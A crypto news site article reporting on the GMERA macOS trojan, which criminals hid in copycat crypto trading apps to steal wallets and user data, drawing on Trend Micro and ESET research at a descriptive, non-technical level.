Reports have emerged that crypto scammers have now managed to steal considerable amounts of cryptocurrency funds from crypto traders. The cybercriminals are using a new trojan that targets trading applications on Apple’s macOS. Studies show that the attack utilized a malware known as GMERA.

An extensive study by the ESET internet security company discovered that this malware is precisely integrated into legitimate-looking crypto trading applications. Once it installs in the user’s device, the malware attempts to steal crypto funds from their wallets.

Antivirus found trojan malware thread

In that context, a group of researchers at Trend Micro cybersecurity firm originally discovered the GMERA malware in September 2019. When they discovered it, the malware was posing perfectly as the Mac-specific stock investment application Stockfolio.

The researchers found two variants of the malware family that crypto scammers and other criminals use. The first one has a pair of shell scripts and it can connect to a remote site to decrypt its encrypted codes. On the other hand, the second sample despite utilizing a simpler routine comprising of a single shell script, it incorporates a persistence mechanism.

The Two Malware Versions

Trojan.MacOS.GMERA.A was flagged by a machine learning system. It was highly challenging to readily identify its malicious behavior since the shell script references other files including AppCode, .pass, and .app. To prove that the behavior was malicious, the researchers sourced the parent file using their infrastructure and the aggregate website VirusTotal. The result discovered the malicious trojan well hidden in genuine-looking files.

Businessman With Laptop Screen Showing Trojan Text

Trojan.macOS.GMERA.B was discovered from the digital certificate of the first sample. It was uploaded to VirusTotal in June 2019. Just like in the first variant, the trojan had an embedded copy of Stockfolio.app version 1.4.13 with the malware author’s digital certificate. It similarly launches the app whenever it is executed to hide its malicious intent.

After it is opened, Trojan.macOS.GMERA.B executes the embedded copy of Stockfolio version 1.4.13 and then launches the shell script run.sh. The script then collects IP addresses and usernames from the infected machines and devices and infects them significantly.

Kattana Application Targeted

ESET also noted that the malware operators integrate the GMERA versions to the original macOS Kattana crypto trading platform. Also, they have meticulously copied the site of the firm and the crypto scammers are now promoting up to four new copycat applications; Cupatrade, Licatrade, Cointrazer, and Trezarus.

Malware and Secure Data Concept.Abstract Technology and Security with Binary code Background

The fake apps come packed with malware and their sites have a download icon integrated into a ZIP archive that contains the trojanized version of the application. Based on the ESET report, all these apps come with full support for all the trading functionalities. This report reads:

“For a person who doesn’t know Kattana, the websites do look legitimate.”

The crypto scammers have been contacting their victims directly and repeatedly, according to the researchers. Additionally, they have been continuously “socially engineering them” to download the infected app.

Trojan Overview

ESET researchers also tested several samples from Licatrade aiming to analyze and understand the malware. Based on their findings, it has a few differences compared to the malware that was discovered on the other applications. Nonetheless, it still functions similarly.

The crypto scammers use the trojan to install a shell script on the targeted device giving the criminal significant access to the user’s system through the application. Then, the shell script lets the attacker create multiple command-and-control servers which are also known as C2 or C&C over HTTP. It operates between their devices and the victim’s systems.

Hacker - Cyber Kriminalität

Interestingly, the C2 servers enable criminals to communicate with the targeted machine constantly. Based on the findings, the GMERA malware steals a variety of information including the victim’s location, crypto wallets, screen capture, and user names.

But, ESET said that they had reported the matter to Apple. In that connection, the certificate issued by Apple to Licatrade was revoked within a few hours. Moreover, the other two certificates that were used for various apps were also revoked by the time they tried to issue attacks.

About the author

Wanguba Muriuki is an Editor at Large for E-Crypto News and author of the book- "The Exploitative Intrigues of Cryptocurrency Scams Explained." He is also a passionate creator who sees every aspect of life from a written perspective. He loves Blockchain, Cryptocurrency, Technology, and Traveling. He is a widely experienced creative and technical writer. Everything and everyone is describable. The best description is written.

Related Posts

E-Crypto News Executive Interviews



Automated trading with HaasBot Crypto Trading Bots

Crypto Scams

Millions in Cryptocurrency Stolen by Scammers in the Last Month According to Tenable Research
November 24, 2021
Behind The Scenes: How this Crypto Community Responded to + $50m Hack
October 18, 2021
Crypto Scams
Crypto Scams Still Persistent In 2021, SEC Warns About Red Flags To Watch
September 9, 2021
Poly Network
Here’s How Hackers Stole Over $600 million in the Poly Network Attack
August 12, 2021
The World’s Most Infamous Crypto Hacks and Scams
July 31, 2021

Blockchain/Cryptocurrency Questions and Answers

Crypto casinos
How Does Bitcoin Casino Work + 2021 Beginner’s Guide
November 8, 2021
Cryptocurrency
How to Buy and Sell Cryptocurrency
November 8, 2021
What Are Bitcoin Futures And How Will They Work In 2022?
November 4, 2021
Ethereum
The Unconventional Guide to Ethereum
October 28, 2021
ICo Presale
The Science Behind ICO Presales…
October 14, 2021


CryptoCurrencyUSDChange 1hChange 24hChange 7d
Bitcoin57,966 0.04 % 0.55 % 2.80 %
Ethereum4,484.2 0.73 % 3.65 % 9.34 %
Binance Coin629.20 0.98 % 2.82 % 12.36 %
Tether0.9986 0.03 % 0.08 % 0.23 %
Solana205.09 0.07 % 2.06 % 5.23 %
Cardano1.610 0.31 % 0.93 % 9.16 %
XRP1.000 0.88 % 3.15 % 3.23 %
Polkadot30.87 2.19 % 17.29 % 10.73 %
USD Coin1.000 0.14 % 0.20 % 0.17 %
Dogecoin0.2215 0.68 % 1.42 % 7.23 %

bitcoin
Bitcoin (BTC) $ 57,878.00
ethereum
Ethereum (ETH) $ 4,445.82
binance-coin
Binance Coin (BNB) $ 623.82
tether
Tether (USDT) $ 0.999511
solana
Solana (SOL) $ 204.56
cardano
Cardano (ADA) $ 1.61
xrp
XRP (XRP) $ 0.991542
polkadot
Polkadot (DOT) $ 37.23
usd-coin
USD Coin (USDC) $ 0.998458
dogecoin
Dogecoin (DOGE) $ 0.215241